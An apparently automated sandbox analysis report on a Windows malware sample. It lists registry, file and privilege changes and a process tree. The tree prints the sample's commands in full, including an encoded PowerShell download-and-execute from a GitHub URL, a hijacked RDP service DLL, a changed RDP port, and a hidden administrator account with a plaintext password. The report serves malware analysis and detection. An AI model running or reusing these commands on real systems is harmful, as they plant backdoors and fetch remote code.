Analysis
-
max time kernel
149s -
max time network
149s -
platform
windows10_x64 -
resource
win10v20201028 -
submitted
06-11-2020 11:02
Static task
static1
Behavioral task
behavioral1
Sample
da79ce774ba5bd61e0c0dc2a4d65f295cacbcfeab1695566c6543923c21b121b.exe
Resource
win7v20201028
Behavioral task
behavioral2
Sample
da79ce774ba5bd61e0c0dc2a4d65f295cacbcfeab1695566c6543923c21b121b.exe
Resource
win10v20201028
General
-
Target
da79ce774ba5bd61e0c0dc2a4d65f295cacbcfeab1695566c6543923c21b121b.exe
-
Size
3.3MB
-
MD5
f2d37d864716da449a7791199ad3eb40
-
SHA1
c04d0b96e4492e1cba6a9604addc1d8f40e98be8
-
SHA256
da79ce774ba5bd61e0c0dc2a4d65f295cacbcfeab1695566c6543923c21b121b
-
SHA512
a03ba66cd51e3d9ef9bbbe0f82e704ca1da13aa089dc3e03cc13900ba8f64e432949928de975d4c103ce977707a983ad1a318dc07f1e3a00d4c8daf3c1e69469
Malware Config
Extracted
https://raw.githubusercontent.com/sqlitey/sqlite/master/speed.ps1
Signatures
-
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.
-
Blacklisted process makes network request 9 IoCs
Processes:
powershell.exeflow pid process 20 3180 powershell.exe 22 3180 powershell.exe 23 3180 powershell.exe 24 3180 powershell.exe 26 3180 powershell.exe 28 3180 powershell.exe 30 3180 powershell.exe 32 3180 powershell.exe 34 3180 powershell.exe -
Modifies RDP port number used by Windows 1 TTPs
-
Sets DLL path for service in the registry 2 TTPs
-
Processes:
resource yara_rule \Windows\Branding\mediasrv.png upx \Windows\Branding\mediasvc.png upx -
Deletes itself 1 IoCs
Processes:
powershell.exepid process 3024 powershell.exe -
Loads dropped DLL 2 IoCs
Processes:
pid process 4068 4068 -
Modifies service 2 TTPs 2 IoCs
Processes:
reg.exedescription ioc process Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\TermService\parameters reg.exe Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\TermService\Parameters\ServiceDLL = "C:\\Windows\\branding\\mediasrv.png" reg.exe -
Drops file in Program Files directory 4 IoCs
Processes:
powershell.exedescription ioc process File opened for modification C:\Program Files\Uninstall Information\IE.HKCUZoneInfo\IE.HKCUZoneInfo.DAT powershell.exe File opened for modification C:\Program Files\Uninstall Information\IE.HKCUZoneInfo\IE.HKCUZoneInfo.INI powershell.exe File opened for modification C:\Program Files\Uninstall Information\IE40.UserAgent\IE40.UserAgent.DAT powershell.exe File opened for modification C:\Program Files\Uninstall Information\IE40.UserAgent\IE40.UserAgent.INI powershell.exe -
Drops file in Windows directory 19 IoCs
Processes:
powershell.exepowershell.exedescription ioc process File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\INetCache\counters2.dat powershell.exe File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGIE10F.tmp powershell.exe File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGIE160.tmp powershell.exe File created C:\Windows\branding\mediasrv.png powershell.exe File opened for modification C:\Windows\branding\Basebrd powershell.exe File created C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\TMP4352$.TMP powershell.exe File opened for modification C:\Windows\branding\wupsvc.jpg powershell.exe File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGIE13F.tmp powershell.exe File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGIE27A.tmp powershell.exe File opened for modification C:\Windows\branding\ShellBrd powershell.exe File opened for modification C:\Windows\branding\mediasrv.png powershell.exe File opened for modification C:\Windows\branding\mediasvc.png powershell.exe File created C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\__PSScriptPolicyTest_tx4iwtuh.lyc.psm1 powershell.exe File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGIE14F.tmp powershell.exe File created C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File created C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log powershell.exe File created C:\Windows\branding\mediasvc.png powershell.exe File created C:\Windows\branding\wupsvc.jpg powershell.exe File created C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\__PSScriptPolicyTest_wm3nqnhl.4cg.ps1 powershell.exe -
Modifies data under HKEY_USERS 217 IoCs
Processes:
powershell.exeWMIC.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\LowIcon = "inetcpl.cpl#005424" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ WMIC.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\IE5_UA_Backup_Flag = "5.0" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\Flags = "33" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\CurrentLevel = "69632" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4 powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Domains powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyEnable = "0" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\PMDisplayName = "My Computer [Protected Mode]" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\1400 = "0" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Ranges powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\PMDisplayName = "Computer [Protected Mode]" powershell.exe Set value (data) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE.HKCUZoneInfo\RegBackup\0\57fd7ae31ab34c2c = 2c0053004f004600540057004100520045005c004d006900630072006f0073006f00660074005c00570069006e0064006f00770073005c00430075007200720065006e007400560065007200730069006f006e005c0049006e007400650072006e00650074002000530065007400740069006e00670073005c0035002e0030005c00430061006300680065002c000000 powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\1200 = "0" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Root\CRLs powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\LowIcon = "inetcpl.cpl#005423" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\Icon = "shell32.dll#0016" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\http = "3" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\LowIcon = "inetcpl.cpl#005425" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\DisplayName = "My Computer" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\DisplayName = "Trusted sites" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\DisplayName = "Local intranet" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\LowIcon = "inetcpl.cpl#005426" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\Flags = "33" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\LowIcon = "inetcpl.cpl#005424" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0 powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\1400 = "1" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\https = "3" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\@ivt = "1" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE40.UserAgent\RegBackup\0.map\2ba02e083fadee33 = ",33,HKCU,Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings,IE5_UA_Backup_Flag," powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\Description = "This zone contains Web sites that you trust not to damage your computer or data." powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE40.UserAgent powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\CurrentLevel = "73728" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\1200 = "3" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\ powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\CA\Certificates powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE.HKCUZoneInfo\RegBackup\0.map\57fd7ae31ab34c2c = ",33,HKCU,SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\5.0\\Cache\\Extensible Cache," powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\EnableNegotiate = "1" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\trust\CTLs powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\Flags = "71" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3 powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\Description = "This zone contains all Web sites that are on your organization's intranet." powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\Icon = "inetcpl.cpl#00004480" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\PMDisplayName = "Internet [Protected Mode]" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\1200 = "0" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\2500 = "3" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Root\Certificates powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\Flags = "33" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Root powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\User Agent = "Mozilla/4.0 (compatible; MSIE 8.0; Win32)" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\CurrentLevel = "0" powershell.exe -
Modifies registry key 1 TTPs 1 IoCs
-
Runs net.exe
-
Script User-Agent 4 IoCs
Uses user-agent string associated with script host/environment.
Processes:
description flow ioc HTTP User-Agent header 24 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 26 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 22 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 23 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) -
Suspicious behavior: EnumeratesProcesses 9 IoCs
Processes:
powershell.exepowershell.exepid process 3024 powershell.exe 3024 powershell.exe 3024 powershell.exe 3024 powershell.exe 3024 powershell.exe 3024 powershell.exe 3180 powershell.exe 3180 powershell.exe 3180 powershell.exe -
Suspicious behavior: LoadsDriver 2 IoCs
Processes:
pid process 624 624 -
Suspicious use of AdjustPrivilegeToken 77 IoCs
Processes:
powershell.exedescription pid process Token: SeDebugPrivilege 3024 powershell.exe Token: SeIncreaseQuotaPrivilege 3024 powershell.exe Token: SeSecurityPrivilege 3024 powershell.exe Token: SeTakeOwnershipPrivilege 3024 powershell.exe Token: SeLoadDriverPrivilege 3024 powershell.exe Token: SeSystemProfilePrivilege 3024 powershell.exe Token: SeSystemtimePrivilege 3024 powershell.exe Token: SeProfSingleProcessPrivilege 3024 powershell.exe Token: SeIncBasePriorityPrivilege 3024 powershell.exe Token: SeCreatePagefilePrivilege 3024 powershell.exe Token: SeBackupPrivilege 3024 powershell.exe Token: SeRestorePrivilege 3024 powershell.exe Token: SeShutdownPrivilege 3024 powershell.exe Token: SeDebugPrivilege 3024 powershell.exe Token: SeSystemEnvironmentPrivilege 3024 powershell.exe Token: SeRemoteShutdownPrivilege 3024 powershell.exe Token: SeUndockPrivilege 3024 powershell.exe Token: SeManageVolumePrivilege 3024 powershell.exe Token: 33 3024 powershell.exe Token: 34 3024 powershell.exe Token: 35 3024 powershell.exe Token: 36 3024 powershell.exe Token: SeIncreaseQuotaPrivilege 3024 powershell.exe Token: SeSecurityPrivilege 3024 powershell.exe Token: SeTakeOwnershipPrivilege 3024 powershell.exe Token: SeLoadDriverPrivilege 3024 powershell.exe Token: SeSystemProfilePrivilege 3024 powershell.exe Token: SeSystemtimePrivilege 3024 powershell.exe Token: SeProfSingleProcessPrivilege 3024 powershell.exe Token: SeIncBasePriorityPrivilege 3024 powershell.exe Token: SeCreatePagefilePrivilege 3024 powershell.exe Token: SeBackupPrivilege 3024 powershell.exe Token: SeRestorePrivilege 3024 powershell.exe Token: SeShutdownPrivilege 3024 powershell.exe Token: SeDebugPrivilege 3024 powershell.exe Token: SeSystemEnvironmentPrivilege 3024 powershell.exe Token: SeRemoteShutdownPrivilege 3024 powershell.exe Token: SeUndockPrivilege 3024 powershell.exe Token: SeManageVolumePrivilege 3024 powershell.exe Token: 33 3024 powershell.exe Token: 34 3024 powershell.exe Token: 35 3024 powershell.exe Token: 36 3024 powershell.exe Token: SeIncreaseQuotaPrivilege 3024 powershell.exe Token: SeSecurityPrivilege 3024 powershell.exe Token: SeTakeOwnershipPrivilege 3024 powershell.exe Token: SeLoadDriverPrivilege 3024 powershell.exe Token: SeSystemProfilePrivilege 3024 powershell.exe Token: SeSystemtimePrivilege 3024 powershell.exe Token: SeProfSingleProcessPrivilege 3024 powershell.exe Token: SeIncBasePriorityPrivilege 3024 powershell.exe Token: SeCreatePagefilePrivilege 3024 powershell.exe Token: SeBackupPrivilege 3024 powershell.exe Token: SeRestorePrivilege 3024 powershell.exe Token: SeShutdownPrivilege 3024 powershell.exe Token: SeDebugPrivilege 3024 powershell.exe Token: SeSystemEnvironmentPrivilege 3024 powershell.exe Token: SeRemoteShutdownPrivilege 3024 powershell.exe Token: SeUndockPrivilege 3024 powershell.exe Token: SeManageVolumePrivilege 3024 powershell.exe Token: 33 3024 powershell.exe Token: 34 3024 powershell.exe Token: 35 3024 powershell.exe Token: 36 3024 powershell.exe -
Suspicious use of WriteProcessMemory 72 IoCs
Processes:
da79ce774ba5bd61e0c0dc2a4d65f295cacbcfeab1695566c6543923c21b121b.exepowershell.execsc.exenet.execmd.execmd.exenet.execmd.execmd.exenet.execmd.exenet.execmd.exenet.execmd.exenet.execmd.exenet.execmd.exenet.execmd.exenet.execmd.execmd.execmd.execmd.exedescription pid process target process PID 4076 wrote to memory of 3024 4076 da79ce774ba5bd61e0c0dc2a4d65f295cacbcfeab1695566c6543923c21b121b.exe powershell.exe PID 4076 wrote to memory of 3024 4076 da79ce774ba5bd61e0c0dc2a4d65f295cacbcfeab1695566c6543923c21b121b.exe powershell.exe PID 3024 wrote to memory of 4068 3024 powershell.exe csc.exe PID 3024 wrote to memory of 4068 3024 powershell.exe csc.exe PID 4068 wrote to memory of 4000 4068 csc.exe cvtres.exe PID 4068 wrote to memory of 4000 4068 csc.exe cvtres.exe PID 3024 wrote to memory of 1720 3024 powershell.exe reg.exe PID 3024 wrote to memory of 1720 3024 powershell.exe reg.exe PID 3024 wrote to memory of 2176 3024 powershell.exe reg.exe PID 3024 wrote to memory of 2176 3024 powershell.exe reg.exe PID 3024 wrote to memory of 2484 3024 powershell.exe reg.exe PID 3024 wrote to memory of 2484 3024 powershell.exe reg.exe PID 3024 wrote to memory of 696 3024 powershell.exe net.exe PID 3024 wrote to memory of 696 3024 powershell.exe net.exe PID 696 wrote to memory of 200 696 net.exe net1.exe PID 696 wrote to memory of 200 696 net.exe net1.exe PID 3024 wrote to memory of 204 3024 powershell.exe cmd.exe PID 3024 wrote to memory of 204 3024 powershell.exe cmd.exe PID 204 wrote to memory of 2576 204 cmd.exe cmd.exe PID 204 wrote to memory of 2576 204 cmd.exe cmd.exe PID 2576 wrote to memory of 2348 2576 cmd.exe net.exe PID 2576 wrote to memory of 2348 2576 cmd.exe net.exe PID 2348 wrote to memory of 3648 2348 net.exe net1.exe PID 2348 wrote to memory of 3648 2348 net.exe net1.exe PID 3024 wrote to memory of 3548 3024 powershell.exe cmd.exe PID 3024 wrote to memory of 3548 3024 powershell.exe cmd.exe PID 3548 wrote to memory of 1444 3548 cmd.exe cmd.exe PID 3548 wrote to memory of 1444 3548 cmd.exe cmd.exe PID 1444 wrote to memory of 752 1444 cmd.exe net.exe PID 1444 wrote to memory of 752 1444 cmd.exe net.exe PID 752 wrote to memory of 508 752 net.exe net1.exe PID 752 wrote to memory of 508 752 net.exe net1.exe PID 2316 wrote to memory of 2100 2316 cmd.exe net.exe PID 2316 wrote to memory of 2100 2316 cmd.exe net.exe PID 2100 wrote to memory of 3048 2100 net.exe net1.exe PID 2100 wrote to memory of 3048 2100 net.exe net1.exe PID 2712 wrote to memory of 2188 2712 cmd.exe net.exe PID 2712 wrote to memory of 2188 2712 cmd.exe net.exe PID 2188 wrote to memory of 1544 2188 net.exe net1.exe PID 2188 wrote to memory of 1544 2188 net.exe net1.exe PID 2396 wrote to memory of 696 2396 cmd.exe net.exe PID 2396 wrote to memory of 696 2396 cmd.exe net.exe PID 696 wrote to memory of 3076 696 net.exe net1.exe PID 696 wrote to memory of 3076 696 net.exe net1.exe PID 2348 wrote to memory of 904 2348 cmd.exe net.exe PID 2348 wrote to memory of 904 2348 cmd.exe net.exe PID 904 wrote to memory of 3788 904 net.exe net1.exe PID 904 wrote to memory of 3788 904 net.exe net1.exe PID 2196 wrote to memory of 2268 2196 cmd.exe net.exe PID 2196 wrote to memory of 2268 2196 cmd.exe net.exe PID 2268 wrote to memory of 2992 2268 net.exe net1.exe PID 2268 wrote to memory of 2992 2268 net.exe net1.exe PID 620 wrote to memory of 2712 620 cmd.exe net.exe PID 620 wrote to memory of 2712 620 cmd.exe net.exe PID 2712 wrote to memory of 212 2712 net.exe net1.exe PID 2712 wrote to memory of 212 2712 net.exe net1.exe PID 3508 wrote to memory of 2192 3508 cmd.exe WMIC.exe PID 3508 wrote to memory of 2192 3508 cmd.exe WMIC.exe PID 204 wrote to memory of 3996 204 cmd.exe WMIC.exe PID 204 wrote to memory of 3996 204 cmd.exe WMIC.exe PID 3356 wrote to memory of 2212 3356 cmd.exe cmd.exe PID 3356 wrote to memory of 2212 3356 cmd.exe cmd.exe PID 2212 wrote to memory of 3180 2212 cmd.exe powershell.exe PID 2212 wrote to memory of 3180 2212 cmd.exe powershell.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\da79ce774ba5bd61e0c0dc2a4d65f295cacbcfeab1695566c6543923c21b121b.exe"C:\Users\Admin\AppData\Local\Temp\da79ce774ba5bd61e0c0dc2a4d65f295cacbcfeab1695566c6543923c21b121b.exe"1⤵
- Suspicious use of WriteProcessMemory
-
\??\c:\windows\System32\WindowsPowerShell\v1.0\powershell.exe-ep bypass -f C:\Users\Admin\AppData\Local\Temp\get-points.ps12⤵
- Deletes itself
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\te0yl3oh\te0yl3oh.cmdline"3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES7610.tmp" "c:\Users\Admin\AppData\Local\Temp\te0yl3oh\CSC527D92C168E4A1DAD338944CE31F98.TMP"4⤵
-
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f3⤵
-
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f3⤵
- Modifies service
- Modifies registry key
-
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f3⤵
-
C:\Windows\system32\net.exe"C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add4⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.execmd /c net start rdpdr4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet start rdpdr5⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 start rdpdr6⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c cmd /c net start TermService3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.execmd /c net start TermService4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet start TermService5⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 start TermService6⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f3⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f3⤵
-
C:\Windows\System32\cmd.execmd /C net.exe user wgautilacc Ghar4f5 /del1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet.exe user wgautilacc Ghar4f5 /del2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user wgautilacc Ghar4f5 /del3⤵
-
C:\Windows\System32\cmd.execmd /C net.exe user wgautilacc kuYvKJrw /add1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet.exe user wgautilacc kuYvKJrw /add2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user wgautilacc kuYvKJrw /add3⤵
-
C:\Windows\System32\cmd.execmd /C net.exe LOCALGROUP "Remote Desktop Users" wgautilacc /ADD1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet.exe LOCALGROUP "Remote Desktop Users" wgautilacc /ADD2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" wgautilacc /ADD3⤵
-
C:\Windows\System32\cmd.execmd /C net.exe LOCALGROUP "Remote Desktop Users" EWYCRADZ$ /ADD1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet.exe LOCALGROUP "Remote Desktop Users" EWYCRADZ$ /ADD2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" EWYCRADZ$ /ADD3⤵
-
C:\Windows\System32\cmd.execmd /C net.exe LOCALGROUP "Administrators" wgautilacc /ADD1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet.exe LOCALGROUP "Administrators" wgautilacc /ADD2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 LOCALGROUP "Administrators" wgautilacc /ADD3⤵
-
C:\Windows\System32\cmd.execmd /C net.exe user wgautilacc kuYvKJrw1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet.exe user wgautilacc kuYvKJrw2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user wgautilacc kuYvKJrw3⤵
-
C:\Windows\System32\cmd.execmd.exe /C wmic path win32_VideoController get name1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name2⤵
- Modifies data under HKEY_USERS
-
C:\Windows\System32\cmd.execmd.exe /C wmic CPU get NAME1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\Wbem\WMIC.exewmic CPU get NAME2⤵
-
C:\Windows\System32\cmd.execmd.exe /C cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA1⤵
- Suspicious use of WriteProcessMemory
-
